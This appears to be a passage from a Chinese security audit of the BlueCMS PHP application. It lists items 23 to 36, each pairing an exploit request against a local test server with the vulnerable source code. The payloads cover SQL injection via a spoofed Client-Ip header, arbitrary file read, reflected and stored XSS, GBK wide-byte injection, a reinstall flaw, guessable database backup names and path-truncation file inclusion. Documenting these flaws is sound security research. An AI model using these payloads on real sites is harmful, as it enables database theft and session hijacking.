Exp:http://127.0.0.3/bluecms/comment.php?act=send&id=1 Post:mood=1&comment=hhh&type=1 Client-Ip:1','1'),('','1','1','1','1',database(),'1','1
elseif($act == 'send')
{
if(empty($id))
{
return false;
}
$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
$mood = intval($_POST['mood']);
$content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
$content = nl2br($content);
$type = intval($_POST['type']);
if(empty($content))
{
showmsg('评论内容不能为空');
}
if($_CFG['comment_is_check'] == 0)
{
$is_check = 1;
}
else
{
$is_check = 0;
}
$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)
VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";
$db->query($sql);
if($type == 1)
{
$db->query("UPDATE ".table('article')." SET comment = comment+1 WHERE id = ".$id);
}
elseif($type == 0)
{
$db->query("UPDATE ".table('post')." SET comment = comment+1 WHERE post_id = ".$id);
}
if($_CFG['comment_is_check'] == 1)
{
showmsg('请稍候,您的评论正在审核当中...','comment.php?id='.$id.'&type='.$type);
}
else
{
showmsg('发布评论成功','comment.php?id='.$id.'&type='.$type);
}
}
23、user.php 112行处存在任意文件读取漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=do_login Post:referer=&user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=1%40qq.com&safecode=s43f&from={base64(文件地址)}&act=do_login
elseif($act == 'do_login'){
$user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
$pwd = !empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
$safecode = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
$useful_time = intval($_POST['useful_time']);
$from = !empty($from) ? base64_decode($from) : 'user.php';
if($user_name == ''){
showmsg('用户名不能为空');
}
if($pwd == ''){
showmsg('密码不能为空');
}
if($safecode == '' || strtolower($safecode) != strtolower($_SESSION['safecode'])){
showmsg('验证码错误');
}
$row = $db->getone("SELECT COUNT(*) AS num FROM ".table('admin')." WHERE admin_name='$user_name'");
if($row['num'] == 1){
showmsg('系统用户组不能从前台登录');
}
$w = login($user_name, $pwd);
if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php')){
list($uid, $username, $password, $email) = uc_user_login($user_name, $pwd);
if($uid>0){
$password = md5($password);
if(!$w){
$db->query("INSERT INTO ".table('user')." (user_name, pwd, email, reg_time) VALUES ('$username', '$password', '$email', '$timestamp')");
$w = 1;
}
$ucsynlogin = uc_user_synlogin($uid);
}
elseif($uid === -1){
if($w){
$user_info = $db->getone("SELECT email FROM ".table('user')." WHERE user_name='$user_name'");
$uid = uc_user_register($user_name, $pwd, $user_info['email']);
if($uid > 0) $ucsynlogin = uc_user_synlogin($uid);
}else $w = -1;
}
}
if($w == -1 || $w==0){
showmsg('您输入的用户名和密码不正确');
}
if($w){
update_user_info($user_name);
if($useful_time !=0){
setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+$useful_time, $cookiepath, $cookiedomain);
setcookie('BLUE[user_name]', $user_name, time()+$useful_time, $cookiepath, $cookiedomain);
setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+$useful_time, $cookiepath, $cookiedomain);
}
echo $ucsynlogin;
showmsg('欢迎您 '.$user_name.' 回来,现在将转到...', $from);
}
}
24、user.php 206行处存在任意文件读取漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=do_reg Post:referer=&user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=1%40qq.com&safecode=s43f&from={base64(文件地址)}&act=do_reg
elseif($act == 'do_reg'){
$user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
$pwd = !empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
$pwd1 = !empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';
$email = !empty($_POST['email']) ? trim($_POST['email']) : '';
$safecode = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
$from = !empty($from) ? base64_decode($from) : 'user.php';
if(strlen($user_name) < 4 || strlen($user_name) > 16){
showmsg('用户名字符长度不符');
}
if(strlen($pwd) < 6){
showmsg('密码不能少于6个字符');
}
if($pwd != $pwd1){
showmsg('两次输入密码不一致');
}
if(strtolower($safecode) != strtolower($_SESSION['safecode'])){
showmsg('验证码错误');
}
if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){
showmsg('该用户名已存在');
}
if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){
showmsg('该用户名已存在');
}
$sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";
if(!$db->query($sql)){
showmsg('很遗憾,注册中出错啦');
}else{
$_SESSION['user_id'] = $db->insert_id();
$_SESSION['user_name'] = $user_name;
update_user_info($_SESSION['user_name']);
setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);
setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);
setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);
if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php'))
{
$uid = uc_user_register($user_name, $pwd, $email);
if($uid <= 0)
{
if($uid == -1)
{
showmsg('用户名不合法!');
}
elseif($uid == -2)
{
showmsg('包含不允许注册的词语!');
}
elseif($uid == -3)
{
showmsg('你指定的用户名 '.$user_name.' 已存在,请使用别的用户名!');
}
elseif($uid == -4){
showmsg('您使用的Email格式不对!');
}
elseif($uid == -5)
{
showmsg('你使用的Email 不允许注册!');
}
else
{
showmsg('注册失败!');
}
}
else
{
$ucsynlogin = uc_user_synlogin($uid);
echo $ucsynlogin;
}
}
$_SESSION['last_reg'] = $timestamp;
showmsg('恭喜您注册成功,现在将转向...', $from);
}
}
25、user.php 130行处存在反射型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=reg&from="/><script>alert(1);</script>"
elseif($act == 'reg')
{
if (!empty($_SESSION['user_id']) && $_SESSION['user_id'] != 1)
{
showmsg('您已经登录,请先退出登录再注册!');
}
if (!isset($_SESSION['last_reg']))
{
$_SESSION['last_reg'] = 0;
}
elseif ($timestamp - $_SESSION['last_reg'] < 30)
{
showmsg('为防止恶意注册,请于30秒后再来注册!');
}
template_assign(array('current_act', 'from'), array('注册新用户', $from));
$smarty->display('reg.htm');
}
26、user.php 58行处存在反射型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=login&from="/><script>alert(1);</script>"
elseif($act == 'login'){
if($_SESSION['user_id']){
showmsg('您已经登录,不需要重新登录', 'user.php');
}
template_assign(array('current_act', 'from'), array('登录', $from));
$smarty->display('login.htm');
}
27、user.php 772行存在储存型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=from=<script>alert(1);</script>&safecode=s43f&from=}&act=do_reg
elseif($act == 'edit_user_info'){
$user_id = intval($_SESSION['user_id']);
if(empty($user_id)){
return false;
}
$birthday = trim($_POST['birthday']);
$sex = intval($_POST['sex']);
$email = !empty($_POST['email']) ? trim($_POST['email']) : '';
$msn = !empty($_POST['msn']) ? trim($_POST['msn']) : '';
$qq = !empty($_POST['qq']) ? trim($_POST['qq']) : '';
$mobile_phone = !empty($_POST['mobile_phone']) ? trim($_POST['mobile_phone']) : '';
$office_phone = !empty($_POST['office_phone']) ? trim($_POST['office_phone']) : '';
$home_phone = !empty($_POST['home_phone']) ? trim($_POST['home_phone']) : '';
$address = !empty($_POST['address']) ? htmlspecialchars($_POST['address']) : '';
if (!empty($_POST['face_pic1'])){
if (strpos($_POST['face_pic1'], 'http://') != false && strpos($_POST['face_pic1'], 'https://') != false){
showmsg('只支持本站相对路径地址');
}
else{
$face_pic = trim($_POST['face_pic1']);
}
}else{
if(file_exists(BLUE_ROOT.$_POST['face_pic3'])){
@unlink(BLUE_ROOT.$_POST['face_pic3']);
}
}
if(isset($_FILES['face_pic2']['error']) && $_FILES['face_pic2']['error'] == 0){
$face_pic = $image->img_upload($_FILES['face_pic2'],'face_pic');
}
$face_pic = empty($face_pic) ? '' : $face_pic;
$sql = "UPDATE ".table('user')." SET birthday = '$birthday', sex = '$sex', face_pic = '$face_pic', email = '$email', msn = '$msn', qq = '$qq'," .
" mobile_phone = '$mobile_phone', office_phone = '$office_phone', home_phone = '$home_phone', address='$address' WHERE user_id = ".intval($_SESSION['user_id']);
$db->query($sql);
showmsg('更新个人资料成功', 'user.php');
}
28、user.php 134行存在储存型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=do_reg Post:user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=from=<script>alert(1);</script>&safecode=s43f&from=}&act=do_reg
elseif($act == 'do_reg'){
$user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
$pwd = !empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
$pwd1 = !empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';
$email = !empty($_POST['email']) ? trim($_POST['email']) : '';
$safecode = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
$from = !empty($from) ? base64_decode($from) : 'user.php';
if(strlen($user_name) < 4 || strlen($user_name) > 16){
showmsg('用户名字符长度不符');
}
if(strlen($pwd) < 6){
showmsg('密码不能少于6个字符');
}
if($pwd != $pwd1){
showmsg('两次输入密码不一致');
}
if(strtolower($safecode) != strtolower($_SESSION['safecode'])){
showmsg('验证码错误');
}
if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){
showmsg('该用户名已存在');
}
if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){
showmsg('该用户名已存在');
}
$sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";
if(!$db->query($sql)){
showmsg('很遗憾,注册中出错啦');
}else{
$_SESSION['user_id'] = $db->insert_id();
$_SESSION['user_name'] = $user_name;
update_user_info($_SESSION['user_name']);
setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);
setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);
setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);
if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php'))
{
$uid = uc_user_register($user_name, $pwd, $email);
if($uid <= 0)
{
if($uid == -1)
{
showmsg('用户名不合法!');
}
elseif($uid == -2)
{
showmsg('包含不允许注册的词语!');
}
elseif($uid == -3)
{
showmsg('你指定的用户名 '.$user_name.' 已存在,请使用别的用户名!');
}
elseif($uid == -4){
showmsg('您使用的Email格式不对!');
}
elseif($uid == -5)
{
showmsg('你使用的Email 不允许注册!');
}
else
{
showmsg('注册失败!');
}
}
else
{
$ucsynlogin = uc_user_synlogin($uid);
echo $ucsynlogin;
}
}
$_SESSION['last_reg'] = $timestamp;
showmsg('恭喜您注册成功,现在将转向...', $from);
}
}
29、guest_book.php 67行处存在sql注入漏洞
Exp:http://127.0.0.3/bluecms/comment.php?act=send Post:content=hhh Client-Ip:1',user())#
elseif ($act == 'send')
{
$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
$rid = intval($_POST['rid']);
$content = !empty($_POST['content']) ? htmlspecialchars($_POST['content']) : '';
$content = nl2br($content);
if(empty($content))
{
showmsg('评论内容不能为空');
}
$sql = "INSERT INTO " . table('guest_book') . " (id, rid, user_id, add_time, ip, content)
VALUES ('', '$rid', '$user_id', '$timestamp', '$online_ip', '$content')";
$db->query($sql);
showmsg('恭喜您留言成功', 'guest_book.php?page_id='.$_POST['page_id']);
}
30、guest_book.php 67行处存在储存型XSS漏洞
Exp:http://127.0.0.3/bluecms/comment.php?act=send Post:content=hhh Client-Ip:1','<script>alert(1);</script>')#
elseif ($act == 'send')
{
$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
$rid = intval($_POST['rid']);
$content = !empty($_POST['content']) ? htmlspecialchars($_POST['content']) : '';
$content = nl2br($content);
if(empty($content))
{
showmsg('评论内容不能为空');
}
$sql = "INSERT INTO " . table('guest_book') . " (id, rid, user_id, add_time, ip, content)
VALUES ('', '$rid', '$user_id', '$timestamp', '$online_ip', '$content')";
$db->query($sql);
showmsg('恭喜您留言成功', 'guest_book.php?page_id='.$_POST['page_id']);
}
31、admin/arc_cat.php 27行处存在储存型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=do_add Post:cat_name='<script>alert(1);</script>'&show_order=0&parent_id=1&title=1&keywords=1description=3
elseif($act == 'do_add'){
$cat_name = trim($_POST['cat_name']);
$parent_id = intval($_POST['parent_id']);
$title = !empty($_POST['title']) ? trim($_POST['title']) : '';
$keywords = !empty($_POST['keywords']) ? trim($_POST['keywords']) : '';
$description = !empty($_POST['description']) ? trim($_POST['description']) : '';
$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : '';
if($parentid == 0){
$cat_indent = 0;
}else{
$cat_indent = get_catindent($parentid)+1;
}
$sql = "INSERT INTO ".table('arc_cat')." (cat_id, cat_name, parent_id, title, keywords, description, cat_indent, is_havechild, show_order ) VALUES ('', '$cat_name', '$parent_id', '$title', '$keywords', '$description', '$cat_indent', '0', '$show_order')";
if(!$db->query($sql)){
showmsg('添加栏目出错', true);
}else{
$sql = "UPDATE ".table('arc_cat')." SET is_havechild='1' where cat_id=$parent_id";
if(!$db->query($sql)){
showmsg('更新栏目出错','arc_cat.php', true);
$db->query("DELETE FROM ".table('arc_cat')." WHERE cat_id=$cat_id");
}
showmsg('添加栏目成功','arc_cat.php?pid='.$parent_id, true);
}
}
32、admin/arc_cat.php 53行处存在储存型XSS漏洞
Exp:http://127.0.0.3/bluecms/user.php?act=edit Post:cat_name='<script>alert(1);</script>'&show_order=0&parent_id=1&title=1&keywords=1description=3
elseif($act == 'edit'){
$sql = "SELECT cat_id, cat_name, parent_id, title, keywords, description, show_order FROM ".table('arc_cat')." WHERE cat_id = $cid";
$cat = $db->getone($sql);
template_assign(array('cat', 'act', 'current_act'), array($cat, $act, '编辑栏目'));
$smarty->display('arc_cat_info.htm');
}
33、宽字节注入漏洞(若设置数据库编码为GBK)
则可利用%df’) or 1=1#')来实现任意sql查询点的注入漏洞
34、网站重装漏洞
由于程序错误导致lock文件未能写入,导致了该漏洞
( ! ) Fatal error: Cannot redeclare class Smarty in D:\phpstudy_pro\WWW\127.0.0.3\bluecms\include\smarty\Smarty.class.php on line 65
Call Stack
# Time Memory Function Location
1 0.0071 173304 {main}( ) ...\index.php:0
2 2.6150 397072 require_once( 'D:\phpstudy_pro\WWW\127.0.0.3\bluecms\include\common.inc.php' ) ...\index.php:154
3 21.8121 808544 require( 'D:\phpstudy_pro\WWW\127.0.0.3\bluecms\include\smarty\Smarty.class.php' ) ...\common.inc.php:66
35、数据库备份爆破漏洞
由于备份文件的命名仅为日期,如20240707.sql,则可以简单爆破获得数据库备份文件名。且数据库备份路径未进行限制访问,造成了数据库备份的下载漏洞。
$file = date("Ymd", time()).'.sql';
elseif ($act == 'do_backup')
{
if (!is_writable(BLUE_ROOT.DATA."backup/"))
{
showmsg('备份文件存放目录data/backup不可写');
}
$limit_size = !empty($_POST['limit_size']) ? intval($_POST['limit_size']) : '2048';
$mysql_type = !empty($_POST['mysql_type']) ? trim($_POST['mysql_type']) : '';
$file = date("Ymd", time()).'.sql';
$version = BLUE_VERSION;
$db_version = $db->dbversion();
$add_time = date("Y-m-d H:i:s");
$sql .= "--BlueCMS VERSION:".$version."\r\n".
"--Mysql VERSION:".$db_version."\r\n".
"--Create time:".$add_time."\r\n";
$num = 1;
if($_POST['tables'])
{
foreach($_POST['tables'] as $val)
{
$sql .= write_head($val);
if ($mysql_type == 'mysql40' && $db_version > 4.0)
{
$sql = preg_replace('/ENGINE=MyISAM(.*)/','TYPE=MyISAM', $sql);
}
elseif($mysql_type == 'mysql41' && $db_version < 4.1)
{
$sql = preg_replace('/TYPE=MyISAM/', 'EMGINE=MyISAM DEFAULT CHARSET='.BLUE_CHARSET, $sql);
}
$row = $db->getone("SELECT COUNT(*) AS num FROM ".$val);
if($row['num'] > 0)
{
$sql .= write_data($val);
}
if (strlen($sql) >= $limit_size * 1000)
{
$file = date("Ymd", time()).'_'.$num.'.sql';
if (!write_file(BLUE_ROOT.DATA.'backup/'.$file, $sql))
{
showmsg('备份数据库卷-'.$num.'失败');
}
else
{
$msg .= '生成备份文件 '.$file.' 成功<br/>';
}
$num++;
$file = date("Ymd", time());
$sql = '';
}
}
}
36、user.php 742行处存在任意文件包含漏洞(仅在php5.2下有效)
Exp:http://127.0.0.3/bluecms/user.php?act=pay Post:pay=1.txt......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
elseif ($act == 'pay'){
include 'data/pay.cache.php';
$price = $_POST['price'];
$id = $_POST['id'];
$name = $_POST['name'];
if (empty($_POST['pay'])) {
showmsg('对不起,您没有选择支付方式');
}
include 'include/payment/'.$_POST['pay']."/index.php";
}